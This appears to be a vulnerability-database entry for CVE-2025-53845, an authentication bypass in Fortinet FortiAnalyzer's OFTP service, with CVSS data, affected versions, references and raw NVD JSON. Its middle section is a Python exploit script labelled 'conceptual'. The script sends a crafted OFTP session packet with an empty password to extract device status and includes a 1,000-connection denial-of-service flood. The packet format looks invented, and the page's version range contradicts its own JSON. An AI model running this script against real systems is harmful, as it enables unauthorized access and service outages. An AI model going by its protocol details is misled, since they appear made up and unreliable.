CVE-2025-53845

Description

An improper authentication vulnerability [CWE-287] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.3 and before 7.4.6 allows an unauthenticated attacker to obtain information pertaining to the device's health and status, or cause a denial of service via crafted OFTP requests.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE

Fortinet FortiAnalyzer >= 7.6.0, <= 7.6.3

Fortinet FortiAnalyzer < 7.4.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-53845 - FortiAnalyzer OFTP Improper Authentication PoC (Conceptual)
# This is a conceptual PoC demonstrating the exploitation of the OFTP authentication bypass
# in FortiAnalyzer. Use only for authorized security testing.

import socket
import struct

TARGET_HOST = "<fortianalyzer_ip>"
OFTP_PORT = 6619  # Default OFTP port for FortiAnalyzer

def build_evil_oftp_request():
    """
    Build a crafted OFTP request that bypasses authentication.
    OFTP uses a simple header structure. The vulnerability lies in
    the lack of proper authentication validation on the server side.
    """
    # OFTP Start Session Request (SSRM) - crafted without valid credentials
    # The server fails to verify the session initiator credentials
    ssrm_payload = b""
    # ODETTE-FTP header magic
    ssrm_payload += b"\x00\x00\x00\x00"
    # Command: SSRM (Start Session Ready Message) = 0x01
    ssrm_payload += b"\x01"
    # Version
    ssrm_payload += b"\x13"
    # Reserved
    ssrm_payload += b"\x00\x00"
    # Compress, Restarts, Resync, etc. flags
    ssrm_payload += b"\x00" * 4
    # User data - intentionally malformed/empty to trigger vuln
    ssrm_payload += b"ATTACKER\x00"
    # Password field - empty (bypass)
    ssrm_payload += b"\x00" * 8

    # OFTP length prefix
    length = struct.pack(">H", len(ssrm_payload))
    return length + ssrm_payload

def exploit_info_disclosure():
    """Exploit the auth bypass to read device health/status info."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    sock.connect((TARGET_HOST, OFTP_PORT))

    payload = build_evil_oftp_request()
    sock.send(payload)

    # Read server response - contains health/status info due to auth bypass
    response = sock.recv(4096)
    print(f"[*] Received response ({len(response)} bytes): {response.hex()}")
    sock.close()
    return response

def exploit_dos():
    """Trigger denial of service by flooding with crafted OFTP requests."""
    for i in range(1000):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((TARGET_HOST, OFTP_PORT))
        payload = build_evil_oftp_request()
        sock.send(payload)
        sock.close()
    print("[+] DoS flood completed")

if __name__ == "__main__":
    exploit_info_disclosure()
    # exploit_dos()  # Uncomment to trigger DoS

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53845
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53845
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53845/
[4] VulDB https://vuldb.com/cve/CVE-2025-53845
[5] https://fortiguard.fortinet.com/psirt/FG-IR-25-378

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53845", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:39.010", "lastModified": "2025-10-15T17:19:50.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper authentication vulnerability [CWE-287] in Fortinet FortiAnalyzer version 7.6.0 through 7.6.3 and before 7.4.6 allows an unauthenticated attacker to obtain information pertaining to the device's health and status, or cause a denial of service via crafted OFTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.7", "matchCriteriaId": "5CD897DB-50DB-420A-8DEB-E3D7FE52DBE6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "7E7EC074-7835-438D-8501-D7FA6A84F280"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-378", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}